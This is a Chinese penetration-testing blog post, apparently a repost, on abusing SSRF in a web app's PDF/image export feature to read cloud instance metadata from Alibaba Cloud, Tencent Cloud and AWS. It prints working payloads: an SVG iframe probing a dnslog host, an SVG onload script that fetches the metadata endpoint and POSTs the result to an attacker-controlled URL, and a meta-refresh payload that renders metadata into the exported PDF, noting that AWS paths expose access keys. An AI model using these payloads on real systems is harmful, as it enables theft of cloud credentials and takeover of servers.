文件导出功能的SSRF
2023-2-25 00:0:32 Author: 橘猫学安全(查看原文) 阅读量:70 收藏

本文讲述一下ssrf加metadata的利用方式,其他常规利用方式,好多师傅已经写过了这里就不再赘述。

文章开始前我们先讲述一下metadata service,也就是云服务器的元数据,每个云服务器厂商都有元数据,只是获取的接口地址不同,获取到的内容也不一样,有些元数据中是可以获取到登录凭证,可以直接接管服务器。由于元数据只能在云服务器上请求特定地址才能获取到,所以也常常用来作为ssrf利用方式的一种。

阿里云

URL:http://100.100.100.200

基本实例元数据项,就不做展示了,感兴趣的可以查看下官方文档https://help.aliyun.com/document\_detail/214777.htm?spm=a2c4g.11186623.0.0.777a4a07R5OHxw#concept-2078137

动态实例元数据项

腾讯云

URL:http://metadata.tencentyun.com/latest/meta-data/

能够获取的信息比较少,可以查看下官方文档https://cloud.tencent.com/document/product/213/4934

AWS

URL:http://169.254.169.254/latest/meta-data/

访问http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2-default-ssm/

可以直接获取AccessKeyId和SecretAccessKey

官方文档https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-retrieval.html

1、有些网站存在功能,能够将一些将数据分析的表格导出为pdf或者图片,如下POST数据包,html文件就是我们要导出的内容,而这里存在ssrf漏洞

2、我们将html内容修改为

<svg><iframe src="[http://123312.h41t0y.dnslog.cn"](http://123312.h41t0y.dnslog.cn") width=" " height=" "/></svg>

可以看到成功触发了dnslog请求,说明此处是存在SSRF漏洞的。

由于 SVG 的功能十分丰富,所以能够处理SVG 的服务器就很有可能遭受到 SSRF、XSS、RCE 等的攻击,特别是在没有禁用一些特殊字符的情况下。

GitHub上有个大佬整理了丰富的svg攻击payload

https://github.com/allanlw/svg-cheatsheet

我们可以利用如下payload去获取metadata service中的数据信息。

首先加载一个可以远程获取到的图片,加载成功后,会触发onload事件 ;

使用 Fetch API接口,将元数据信息在存储到“params”参数中;

服务器向URL地址发起携带params的POST请求,这样我们就可以在历史数据包中找到我们想要的元数据信息了。

同理此方法也可以获取其他想要的数据信息。

<svg width="100%" height="100%" viewBox="0 0 100 100"
xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<image xlink:href="https://www.baidu.com/img/flexible/logo/pc/[email protected]" height="20" width="20" onload="fetch('http://metadata.tencentyun.com/latest/meta-data/').then(function (response) {
response.text().then(function(text) {
var params = text;
var http = new XMLHttpRequest();
var url = 'https://xxxxxxxxxxxxxxxx/';
http.open('POST', url, true);
http.send(params);
})});"
/>
</svg>

利用:

当一些特殊标签比如<svg>,<Iframe>等被禁用后,我们可以使用<meta>0秒刷新请求元数据,以下为具体payload

<meta http-equiv="refresh" content="0;url=http://metadata.tencentyun.com/latest/meta-data" />

那么目标服务器的metadata信息就会打印在输出的PDF文件上

拓展

应用程序导出数据为PDF或图片,会产生ssrf的原因,我认为是后端在处理数据的时候,没有进行过滤,导致了恶意代码的运行,那么我们在任意文件上传的漏洞,是不是可以直接上传svg文件,达到一些命令执行的效果呢

参考

https://github.com/allanlw/svg-cheatsheet

https://infosecwriteups.com/svg-ssrfs-and-saga-of-bypasses-777e035a17a7

https://twitter.com/kunalp94/status/1502527605836173312

作者:苏苏的五彩棒,文章来源于https://forum.butian.net/share/1497

如有侵权,请联系删除

推荐阅读

实战|记一次奇妙的文件上传getshell
「 超详细 | 分享 」手把手教你如何进行内网渗透
神兵利器 | siusiu-渗透工具管理套件
一款功能全面的XSS扫描器
实战 | 一次利用哥斯拉马绕过宝塔waf
BurpCrypto: 万能网站密码爆破测试工具
快速筛选真实IP并整理为C段 -- 棱眼
自动探测端口顺便爆破工具t14m4t
渗透工具|无状态子域名爆破工具(1秒扫160万个子域)
查看更多精彩内容,还请关注橘猫学安全:
每日坚持学习与分享,觉得文章对你有帮助可在底部给点个“再看

文章来源: http://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247505175&idx=1&sn=446ed7f226b565b852aa325af6199167&chksm=c04d5229f73adb3fa9f26c47ce6cd7d147ebafcc639f259b98b979b6f13856420b658970556c#rd
如有侵权请联系:admin#unsafe.sh